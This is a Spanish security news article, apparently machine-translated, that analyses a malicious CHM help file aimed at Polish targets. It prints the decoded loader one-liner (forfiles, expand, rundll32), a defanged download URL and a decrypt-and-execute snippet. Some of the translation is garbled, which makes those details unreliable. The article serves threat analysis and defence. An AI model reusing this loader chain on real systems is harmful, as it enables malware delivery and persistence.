Un archivo HTML de Microsoft malicioso compilado por HTML (CHM) cargado desde Polonia el 30 de junio de 2025 ha demostrado cómo un formato de documentación heredado puede reutilizarse en un potente vehículo de entrega para malware moderno.
Llamado “Deklaracja.chm”, el archivo se disfraza de una declaración de transferencia de banco y se abre con una imagen de recibo benigna, enviando a las víctimas a una falsa sensación de seguridad mientras oculta una carga útil de varias etapas sofisticadas.
Declaration.Chm Contenido del archivo (Fuente – GitHub)
El ataque comienza en el momento en que Windows ayuda a ejecutable (hh.exe) procesa el CHM. Enterrado en el interior hay un índice ofuscado.
Este archivo contiene el verdadero descargador DLL, pero nunca se revuelve en la interfaz de usuario.
analistas de DMPDUMP anotado que el script también instancia el HTML Help ActiveX Control (ADB880A6-D8FF-11CF-9377-00AA003B7A11) para ejecutar una cadena de comando oculta, aprovechando el legítimo binario de Windows Binary.exe para evitar correlaciones sospechosas de los padres.
La táctica refleja una tendencia en el abuso de la tierra (LOTL), lo que permite a los atacantes dejar de lado muchas defensas de comportamiento mientras logran la ejecución del código en sistemas totalmente parcheados.
Mientras que los informes atribuyen la infraestructura al clúster Frostyneighbor/UNC1151 ligado a Bielorrusia, el peligro práctico de la campaña radica en su sigilo.
Dirigido a las entidades polacas, muestra cómo un tipo de archivo aparentemente obsoleto puede perforar las defensas de punto final contemporáneo, allanando el camino para el robo de credenciales, el espionaje o las operaciones de seguimiento destructivas.
Mecanismo de infección en enfoque
Una vez que se ejecuta el control ActiveX, hace clic mediante un botón diseñado que genera un símbolo del sistema minimizado.
La siguiente línea de una sola línea, descomprimida de múltiples capas de codificación, ilustra el corazón de la intrusión:-
cmd /min /c forfiles /p %temp % /m *.tmp /c “cmd /c if @fsize == 180738 expandir @file %temp %\ unt32.dll & rundll32 %temp %\ unt32.dll,#1”
Aquí, Forfiles busca el recién descargado .TMP (exactamente 180,738 bytes). Cuando se encuentra, el nativo de Windows expande la utilidad de los desempaqueras hasta 32.dll desde el gabinete, y RunDLL32 llama a su exportación #1, lanzando el descargador C ++.
UNT32.dll (Fuente – GitHub)
Esta DLL descifra las cadenas incrustadas con una tecla XOR giratoria de 128 bytes, luego usa WinHTTP para obtener hxxps: // Rustyquill (.) Top/shw/the-Magnus-propo1.jpg.
Si el JPEG excede los 289,109 bytes, todo más allá de esa marca se descarta en net32.dll, almacenada en %AppData %\ tasksync \ y se registra como una tarea programada, que proporciona la persistencia automática sin escrituras de registro.
if (payload_size> 0x46835) {Decrypt (buffer + 0x46835, clave, descifrado); SaveanDexECUTE (descifrado, “tasksync \\ net32.dll”); }
A través de esta cadena elegantemente simple, los archivos de ayuda heredado se convierten en caballos troyanos, combinando trucos de interfaz de usuario, binarios de ventanas de confianza y tráfico de red sutil para lograr un punto de apoyo que muchas herramientas de seguridad aún subestiman.
Detectar malware en un entorno en vivo analizar archivos y URL sospechosos en cualquiera. Prueba gratis
